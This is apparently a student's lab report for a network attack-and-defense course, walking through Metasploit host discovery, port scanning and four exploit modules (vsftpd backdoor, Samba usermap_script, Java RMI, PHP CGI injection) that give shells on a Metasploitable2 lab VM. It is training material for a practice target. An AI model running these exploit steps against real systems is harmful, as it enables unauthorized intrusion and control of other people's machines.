首页 > 其他分享 >20222310 2024-2025-1 《网络与系统攻防技术》实验六实验报告

20222310 2024-2025-1 《网络与系统攻防技术》实验六实验报告

时间:2024-11-16 15:07:33浏览次数:1  
标签:use set 漏洞 端口 192.168 2024 2025 靶机 20222310

一、实验内容

学习掌握Metasploit工具的使用。

下载靶机Metasploitable2,完成以下实验内容。

1.前期渗透

(1)主机发现(可用Aux中的arp_sweep,search一下就可以use)

(2)端口扫描(可以直接用nmap,也可以用Aux中的portscan/tcp等)

(3)扫描系统版本,漏洞等

2.Vsftpd源码包后门漏洞(21端口)

3.SambaMS-RPC Shell命令注入漏洞(端口139)

4.Java RMI SERVER命令执行漏洞(1099端口)

5.PHP CGI参数执行注入漏洞(80端口)

二、实验过程

1.前期渗透

(1)主机发现

靶机ifconfig,查看靶机的ip地址,为192.168.196.129

攻击机ping靶机,能ping通

打开msfconsole控制台,search arp_sweep选择漏洞

use 0
set rhost 192.168.196.129
run

扫描靶机,成功找到

(2)端口扫描

打开msfconsole控制台,search portscan/tcp选择漏洞

use 0
set rhost 192.168.196.129
set ports 1-2000
run

(因为tcp扫描速度比较慢,这里只选择扫描1-2000端口,有兴趣的可以扫描1-65535端口)开放的端口如图

(3)扫描目标HTTP服务器的HTTP版本信息

打开msfconsole控制台,use auxiliary/scanner/http/http_version选择漏洞

set rhost 192.168.196.129
run

成功扫描出了HTTP版本信息

2.Vsftpd源码包后门漏洞(21端口)

在之前的端口扫描中,我们知道了21端口是可以被利用的

打开msfconsole控制台,use exploit/unix/ftp/vsftpd_234_backdoor选择漏洞

set rhost 192.168.196.129
run

成功得到了靶机的shell,输入uname -a,pwd,id,ifconfig验证

3.SambaMS-RPC Shell命令注入漏洞(端口139)

在之前的端口扫描中,我们知道了139端口是可以被利用的

打开msfconsole控制台,use exploit/multi/samba/usermap_script选择漏洞

set rhost 192.168.196.129
exploit

成功得到了靶机的shell,输入uname -a,ifconfig验证

4.Java RMI SERVER命令执行漏洞(1099端口)

在之前的端口扫描中,我们知道了1099端口是可以被利用的

打开msfconsole控制台,use exploit/multi/misc/java_rmi_server选择漏洞

set rhost 192.168.196.129
run

进程建立成功,接着输入sessions -i 1,shell,ls验证得到了shell

也可以输入whoami进行验证

5.PHP CGI参数执行注入漏洞(80端口)

在之前的端口扫描中,我们知道了80端口是可以被利用的

打开msfconsole控制台,use exploit/multi/http/php_cgi_arg_injection选择漏洞

set rhost 192.168.196.129
run

获得了靶机的shell,输入shell,ls查看文件

三、问题及解决方案

问题1:virtualbox上安装的kali无法与给定的靶机进行有效互动,有些漏洞利用不了

问题1解决方案:在vmware上重建一个kali虚拟机,并且kali和ubuntu的网络连接方式都设置为NAT模式

四、学习感悟、思考等

经过课上作业和

标签:use,set,漏洞,端口,192.168,2024,2025,靶机,20222310
From: https://www.cnblogs.com/abe1fan/p/18549377

相关文章

  • 20222423 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容1.1内容回顾总结总而言之这周都重点在于Metasploit工具的使用时间上,对其功能和使用流程有了深入了解,也越发感叹道魔高一尺,道高一丈,好多漏洞如今的操作系统或者软件都已经修复,通过msf针对漏洞实施变得越发困难(重点点名本周的msf测试作业,让我一天都没吃上饭,基本上时间......
  • # 20222403 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容本实践目标是掌握metasploit的用法。指导书参考Rapid7官网的指导教程。https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/下载官方靶机Metasploitable2,完成下面实验内容。(1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use)......
  • InDesign 2025 for Mac(Id2025)最新激活版20.0.0
    InDesign2025具备强大的功能和灵活的扩展性,支持插件扩展,用户可以根据自身需求自定义工具和工作流程。在处理复杂排版和多页面设计时,InDesign2025注重用户界面的友好性与功能的直观性,即使是新手用户也能快速上手。InDesign2025增强了多模态图文编辑能力,使得图像与文字的结合更......
  • 20222323 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    1.实验内容掌握metasploit的用法。下载官方靶机Metasploitable2,完成下面实验内容。(1)前期渗透①主机发现(可用Aux中的arp_sweep,search一下就可以use)②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。③选做:也可以扫系统版本、漏洞等。(2)Vsftpd源码包后门漏洞(21端口)(3)S......
  • 20222306 2024-2025-1 《网络与系统攻防技术》实验五实验报告
    1.实验内容(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式该域名对应IP地址IP地址注册人及联系方式IP地址所在国家、城市和具体地理位置PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集......
  • 网络安全(黑客)2024小白自学必看
    ......
  • 【IEEE出版、八大高校联合举办、稳定EI检索】第四届人工智能与智能制造国际研讨会(AIIM
    第四届人工智能与智能制造国际研讨会(AIIM2024)The4thInternationalSymposiumonArtificialIntelligenceandIntelligentManufacturing2024年12月20-22日中国成都重要信息大会官网:www.isaiim.com大会时间:2024年12月20-22日大会地点:中国-成都二轮截......
  • 20222327 2024-2025-1 《网络与系统攻防技术》实验六实验报告
    一、实验内容学习掌握了Metasploit工具的使用,具体的操作总结来说就是Search-Use-Show-Set-Exploit/run学习了利用相关漏洞进行模拟攻击的操作,对防范恶意攻击有了一些认识(安装杀软,不要点击陌生网站、文件链接等)二、实验过程1、前期渗透①主机发现(可用Aux中的arp_sweep,search一......
  • 2024-11-16 特殊矩阵的压缩存储
    一、数组的存储结构1.一维数组:各元素大小相同,且物理上连续存放。a[i]=起始地址+i*siezof(数组元素大小)2.二维数组:b[j][j]=起始地址+(i*N+j)*sizeof(数组元素大小)二、特殊矩阵1.普通矩阵的存储:使用二维数组来存储。2.对称矩阵的压缩存储:若n阶方阵中任意一个元素aij都有ai......
  • 华为OD机试真题-会议接待-2024年OD统一考试(E卷)
    最新华为OD机试考点合集:华为OD机试2024年真题题库(E卷+D卷+C卷)_华为od机试题库-CSDN博客     每一题都含有详细的解题思路和代码注释,精编c++、JAVA、Python三种语言解法。帮助每一位考生轻松、高效刷题。订阅后永久可看,发现新题及时跟新。题目描述某组织举行会议,来了多......